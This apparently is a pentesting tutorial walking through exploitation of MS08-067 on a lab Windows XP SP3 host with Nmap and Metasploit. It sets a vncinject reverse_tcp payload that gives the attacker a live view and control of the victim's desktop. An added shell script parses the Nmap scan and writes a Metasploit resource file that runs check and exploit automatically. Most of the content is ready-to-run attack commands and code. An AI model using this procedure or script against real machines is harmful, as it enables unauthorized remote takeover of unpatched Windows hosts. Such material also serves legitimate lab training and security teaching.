
[Pentesting] XP sp3 Remote Exploit with ms08_067


 

Vulnerability : MS08-067 (CVE-2008-4250)

 

Payload : windows/vncinject/reverse_tcp

 

Platforms : Windows 

 

Architectures : x86

 

Target : 192.168.233.130 ( Windows XP sp3 )

 

Attacker : 192.168.233.129 ( Linux BackTrack5-R3 )

 

 

- Process -

This time we will exploit Windows XP SP3 through the MS08-067 vulnerability.

MS08-067 :

A specially crafted RPC request to the Server service (the path-canonicalization code in netapi32.dll, reachable over SMB on TCP port 445) triggers a stack buffer overflow and allows remote code execution.

Windows 2000, Windows XP and Windows Server 2003 have this vulnerability.

So an attacker can run arbitrary code on the victim's PC without any authentication.

 
1. First, check with Nmap whether the target PC is still vulnerable to MS08-067.

   If the vulnerability has already been patched, the exploit cannot work, so there is no point in continuing.

 Command : nmap -sS -A --script=smb-check-vulns -Pn [Victim's IP]

   -Pn (formerly -P0) skips host discovery, which matters because XP's firewall drops pings. The check needs TCP 445 open and reports a line such as "MS08-067: VULNERABLE" or "MS08-067: PATCHED". In Nmap 7 and later the smb-check-vulns script was split up, and this check lives in smb-vuln-ms08-067.

 If the scan reports the host as patched, we can't exploit it, so stop here. Otherwise, on to Metasploit.
 
2. In msfconsole, find the module called "ms08_067_netapi".

 Cmd : search ms08_067

3. Use it!

 Cmd : use exploit/windows/smb/ms08_067_netapi

4. Payload setting time!

 This time we will use the windows/vncinject/reverse_tcp payload. It injects a VNC server into the exploited process on the victim, which then connects back to our listener.

 Cmd : set PAYLOAD windows/vncinject/reverse_tcp

 Set LHOST ( my IP ), LPORT ( my listening port ), RPORT ( 445 )
        and RHOST ( victim IP ), then run exploit.
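The whole procedure above (gate on the Nmap result, then steps 2 to 4 in msfconsole) as one script. This is an added example, not code from the original post: the helper names ms08067_status and build_ms08067_rc are hypothetical, the Nmap output is a constructed sample in the format Nmap 6's smb-check-vulns prints, and the IPs are the lab addresses from the post. The generated text is a Metasploit resource file, so you run it with msfconsole -r instead of typing each step by hand.

```shell
#!/bin/sh
# Added example, not from the original post. Hypothetical helpers:
#   ms08067_status   - reads Nmap smb-check-vulns output on stdin, prints
#                      VULNERABLE, PATCHED or UNKNOWN
#   build_ms08067_rc - prints an msfconsole resource script for steps 2-4

ms08067_status() {
    # Pull the text after "MS08-067: " from the script's result line.
    # UNKNOWN also covers a missing line (script did not run / port closed).
    line=$(sed -n 's/^|[ _]*MS08-067: *//p' | head -n 1)
    case "$line" in
        VULNERABLE*) echo VULNERABLE ;;
        PATCHED*)    echo PATCHED ;;
        *)           echo UNKNOWN ;;
    esac
}

# $1 = RHOST (victim), $2 = LHOST (attacker), $3 = LPORT (default 4444).
# ViewOnly is false so the VNC session can control the desktop, and
# "check" runs the module's own vulnerability test before "exploit".
build_ms08067_rc() {
    rhost=$1; lhost=$2; lport=${3:-4444}
    printf '%s\n' \
        "use exploit/windows/smb/ms08_067_netapi" \
        "set RHOST $rhost" \
        "set RPORT 445" \
        "set PAYLOAD windows/vncinject/reverse_tcp" \
        "set LHOST $lhost" \
        "set LPORT $lport" \
        "set ViewOnly false" \
        "check" \
        "exploit"
}

# Constructed sample (not a real capture) in the format Nmap 6 prints for an
# unpatched XP SP3 host.
SAMPLE_NMAP="Host script results:
| smb-check-vulns:
|   MS08-067: VULNERABLE
|   Conficker: Likely CLEAN
|   regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
|_  MS06-025: NO SERVICE (the Ras RPC service is inactive)"

# Demo: only emit the resource script when the scan says VULNERABLE.
# Real use: nmap -sS -A --script=smb-check-vulns -Pn TARGET > scan.txt
#           ms08067_status < scan.txt
if [ "$(printf '%s\n' "$SAMPLE_NMAP" | ms08067_status)" = "VULNERABLE" ]; then
    build_ms08067_rc 192.168.233.130 192.168.233.129 4444
else
    echo "target not reported vulnerable; not exploiting" >&2
fi
```

Save the printed lines as ms08_067.rc and run `msfconsole -r ms08_067.rc`; if `check` says the target is not vulnerable, abort before `exploit` runs.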
 

 

- Exploit Success!

 

If the exploit succeeds, a VNC viewer window showing the victim's desktop opens on your screen.
- If the exploit reports success but no VNC window appears, the vncviewer client is not installed on your (attacker) machine: the VNC server runs inside the victim, and Metasploit launches vncviewer locally to connect to it. Also note that the session is view-only by default; set ViewOnly false before running exploit if you want to control the desktop.

 

 

- End